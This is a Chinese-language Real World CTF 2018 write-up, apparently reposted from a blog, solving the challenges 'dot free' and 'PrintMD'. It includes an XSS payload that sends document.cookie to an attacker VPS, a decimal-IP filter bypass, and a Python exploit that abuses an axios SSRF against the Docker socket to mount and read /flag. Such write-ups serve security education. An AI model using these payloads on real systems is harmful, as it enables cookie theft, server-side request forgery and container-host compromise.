内容简介:This platform is under protection. DO NOT hack it.任意方式攻击平台导致403就能拿到Flag
0x01 advertisement (check-in)
Detail
This platform is under protection. DO NOT hack it.
Writeup
任意方式攻击平台导致403就能拿到Flag
(忘了截图,偷来的)
Flag : rwctf{SafeLine 1s watch1ng_uuu}
0x02 dot free (Web)
Detail
All the IP addresses and domain names have dots, but can you hack without dot?
http://13.57.104.34/
Writeup
提交url数组导致报错,根据Debug信息,推测为XSS题目
并暴露部分代码
尝试XSS后不成功,Fuzz后发生意外,非预期
右键查看源码可见
function lls(src) { var el = document.createElement('script'); if (el) { el.setAttribute('type', 'text/javascript'); el.src = src; document.body.appendChild(el); } }; function lce(doc, def, parent) { var el = null; if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]); else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]); if (!el) return false; for (var i = 1; i < def.length; i++) el.setAttribute(def[i++], def[i]); if (parent) parent.appendChild(el); return el; }; window.addEventListener('message', function (e) { if (e.data.iframe) { if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) { if (e.data.iframe.type == "iframe") { lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent); } else { lls(e.data.iframe.value) } } } }, false); window.onload = function (ev) { postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*') }
获取 location.search
内容解析JSON并发送 message
事件,然后据其添加一个 iframe
然后需要绕过
e.data.iframe.value.indexOf('.') == -1 e.data.iframe.value.indexOf("//") == -1 e.data.iframe.value.indexOf("。") == -1 typeof(e.data.iframe != 'object')
即构造十进制ip,web服务默认索引为index.php
<?php header("Content-type: text/javascript"); ?> var c = escape(document.cookie); location.href = 'http://vps_ip:7799/?cookie='+c;
Payload : http://13.57.104.34/?%7B%22iframe%22:%7B%22value%22:%22%5C%5C%5C%5Cvps_ip_to_dec:7799%22%7D%7D
Flag : rwctf{L00kI5TheFlo9}
0x03 BookHub (web)
比较有意思,拿出来发单篇
详见 BookHub Writeup - Real World CTF 2018
0x04 PrintMD (web) 复现
RealWorldCTF PrintMD writeup -- CurseRed
Detail
Make HackMD printable ._. http://54.183.55.10/
Hint: If you are not skilled at black-box testing, you need to figure out how PrintMD is compatible with outdated browsers. Flag is in the filesystem /flag
Hint: Here is a render.js for you.
render.js
```javascript
const {Router} = require('express')
const {matchesUA} = require('browserslist-useragent')
const router = Router()
const axios = require('axios')
const md = require('../../plugins/md_srv')
router.post('/render', function (req, res, next) {
let ret = {}
ret.ssr = !matchesUA(req.body.ua, {
browsers: ["last 1 version", "> 1%", "IE 10"],
_allowHigherVersions: true
});
if (ret.ssr) {
axios(req.body.url).then(r => {
ret.mdbody = md.render(r.data)
res.json(ret)
})
}
else {
ret.mdbody = md.render('# 请稍候…')
res.json(ret)
}
});
module.exports = router
```
Writeup
服务器通过判断 User-Agent
是否在服务端抓取并解析markdown文档。
这个地方很尴尬,在控制台发现了xhr下载操作../download,并看了print.ba84889093b992d33112.js但是却没有细看其中的逻辑,看的时候render.js提示还没有放出来,然后也就忘记了/api/render这个操作,无可救药了
然后在看到render.js的时候,误以为是md_srv解析器RCE漏洞,webin太多以至于走火入魔了
然后在 print.ba84889093b992d33112.js 中可以找到将markdown文档发送到服务端解析的代码
validate: function(e) { return e.query.url && e.query.url.startsWith("https://hackmd.io/") }, asyncData: function(ctx) { if(!ctx.query.url.endsWith("/download")){ ctx.query.url += "/download"; } ctx.query.ua = ctx.req.headers["user-agent"] || ""; return axios.post("/api/render", qs.stringify({...ctx.query})).then(function(e) { return { ...e.data, url: ctx.query.url } }) }, mounted: function() { if (!this.ssr){ axios(this.url).then(function(t) { this.mdbody = md.render(t.data) }) } }
回顾 render.js ,可知,可以通过HTTP参数 ctx.query
污染后在传递到后端 axios(req.body.url)
因此,这个地方存在一个SSRF漏洞,但是 axios 这个东西是不支持 file:// 协议的,但是通过文档可知,他支持 UNIX Socket ,并给出一个例子 /var/run/docker.sock
。
Ping一波就成功返回 OK
也就是说可以通过 axios 进行对 Docker 的未授权访问!!!
通过 Docker Remote API ,我们可以尽情愉快玩耍!!!
Flag : rwctf{a journey from ssr to ssrf PogChamp}
exp.py
import requests as req import random import string from bs4 import BeautifulSoup from urllib import quote as urlencode URL = "http://54.183.55.10/print?{url}&url=https%3A%2F%2Fhackmd.io%2Fvbz2j6hkR9CIgABjEbRrzQ" headers = { "User-Agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" } def get(u): res = req.get(u, timeout=10, headers=headers) if res.status_code == 200: soup = BeautifulSoup(res.content, "lxml") body = soup.select(".markdown-body") if body: print(body[0].text) return True print("[-] error") def fuck(_u): _u += '&url[socketPath]=/var/run/docker.sock' pl = URL.format(url=_u) try: get(pl) except: pass if __name__ == '__main__': container_name = ''.join(random.sample( string.ascii_letters + string.digits, 6)) _us = [ 'url[url]=/_ping&', 'url[method]=post&url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest', 'url[method]=post&url[url]=http://127.0.0.1/containers/create?name=%s&url[data][Image]=alpine:latest&url[data][Volumes][flag][path]=/getflag&url[data][Binds][]=/flag:/getflag:ro&url[data][Entrypoint][]=/bin/ls' % container_name, 'url[method]=post&url[url]=http://127.0.0.1/containers/%s/start' % container_name, 'url[method]=get&url[url]=http://127.0.0.1/containers/%s/archive?path=/getflag' % container_name ] for i in _us: fuck(i)
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 你负责人工智能哪部分?人工那部分;知识图谱的构建主要靠人工还是机器?
- cocosdx接bugly,上传符号表,有一部分内容解析出来了, 另一部分没有解析出来
- GO的部分总结~
- MySQL基础部分总结
- python字典实例(部分)
- DDCTF2018 部分writeup
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。